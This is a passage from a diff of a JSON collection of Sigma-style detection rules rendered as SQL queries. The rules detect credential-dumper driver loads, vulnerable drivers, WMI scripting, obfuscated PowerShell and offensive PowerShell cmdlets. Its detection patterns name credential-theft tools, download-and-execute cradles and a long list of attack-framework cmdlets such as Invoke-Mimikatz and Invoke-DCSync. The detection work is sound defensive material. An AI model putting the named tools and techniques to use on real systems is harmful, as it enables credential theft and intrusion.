'%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", @@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE 